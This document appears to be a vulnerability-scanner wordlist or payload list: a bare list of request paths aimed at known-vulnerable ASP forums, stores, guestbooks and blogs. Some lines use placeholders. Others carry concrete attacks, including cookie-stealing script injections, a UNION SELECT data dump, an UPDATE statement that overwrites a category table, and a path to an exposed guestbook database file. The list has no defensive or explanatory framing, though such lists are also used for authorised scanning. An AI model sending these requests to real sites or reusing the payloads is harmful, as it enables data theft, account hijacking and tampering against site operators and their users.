/Default_.aspx?lang=1&sub=5&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3E
/path_to_storye/dettaglio.asp?id_doc='[SQL code]
/path_to_storye/dettaglio.asp?id_aut='[SQL code]
/DUclassmate/default.asp?iState=[SQL Inject]&nState=Florida
/asp/detail.asp?l=&p='[sql]
/module/support/task/detail.asp?taskid='[SQL_INJECTION]
/path/dispimage.asp?id=[SQL Injection]
/path/admin/main.asp?date=[SQL]
/forum/admin/
/UblogReload/trackback.asp?bi=[id]&btitle=[XSS]&mode=view
/UblogReload/trackback.asp?bi=343&btitle=<script>alert('document.cookie')</script>&mode=view
/search.asp?option=simple&keywords=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&submit1=Find
/[webwizdir]/search_form.asp?ReturnPage=Search&search=XSS&searchMode=allwords&searchIn=Topic&forum=0&searchSort=dateDESC&SearchPagePosition=1
/articleZone.asp?example2=[XSS]
/infinicart-demo/browsesubcat.asp?catid=[sql]
/infinicart-demo/browsesubcat.asp?catid=13&subid=[sql]
/forum/forum.asp?forum_id=3&forum_title=[XSS]
/student.asp?msg=[XSS]
/store/error.asp?message='"><script>alert(document.cookie)</script>
/Forums/setup.asp?RC=3&MAIL=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E http
/default.asp?gb=paketayrinti&id=18+union+select+0,1,2,3,4,5,6,7+from+uye
/search/searchresults.asp?searchField=[XSS]
/search_employees.asp?keywords=[XSS]
/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible[XSS-here]
/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[XSS-here]&Cat1Literal=Bible
/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts[XSS-here]&Cat1=839&Cat1Literal=Bible
/store/BrowseCategories.asp?Cat0=783[XSS-here]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible
/store/Search.asp?InStock=[XSS-here]&SearchType=783&strSearch=i&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1
/store/Search.asp?InStock=&SearchType=783&strSearch=[XSS-here]&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1
/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1[XSS-here]&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1
/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1[XSS-here]&PriceMin=&PriceMax=&PublicationDate=-1
/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=[XSS-here]&PriceMax=&PublicationDate=-1
/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=[XSS-here]&PublicationDate=-1
/store/AdvancedSearch.asp?strSearch=[XSS-CODE]&SearchType=-1&SearchCat1=-1&SearchCat2=-1&Author=dd&PublicationDate=-1&PriceMin=1&PriceMax=11111111&B1=Submit
/store/ViewItem.asp?ISBN=0789906651[XSS-here]&Cat0=565
/store/ViewItem.asp?ISBN=0789906651&Cat0=565[XSS-here]
/store/STWShowContent.asp?idRightPage=13032[XSS-CODE]
/store/MySide.Asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]
/store/BrowseMain.asp?Cat0=565[XSS-CODE]&Cat0Literal=Bibles&CurHigh=4
/store/BrowseMain.asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4
/store/BrowseMain.asp?Cat0=783&Cat0Literal=Gifts&CurHigh=3"><script>alert(document.cookie)</script>
/store/[email protected]&RedirectURL=[XSS-CODE]
/store/Login.asp?RedirectURL=[XSS-code]
/store/searchResults.asp?name=&idCategory=&sku='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&priceFrom=0&priceTo=9999999999&validate=1
/[path]/dept.asp?id=[SQL]
/Calendar/details.asp?Event_ID='
/pc/pcadmin/editCategories.asp?nav=&lid=[id cat][sql injection]
/lookup/lookup_result.asp?domain=[XSS]&tld=.com
/agencyCatResult.asp?cmbCat='%20UPDATE%20rftCategory%20set%20Category%20=%20'Aria-Security Team';--
/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
/search.asp?search=[XSS]
/kb.asp?a=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/kb.asp?ID=210&a=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/dUpro/Businesses/../home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION
/dUpro/Classifieds/../home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION
/dUpro/Events/../home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION
/dUpro/events/../home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION
/dUpro/Files/../home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION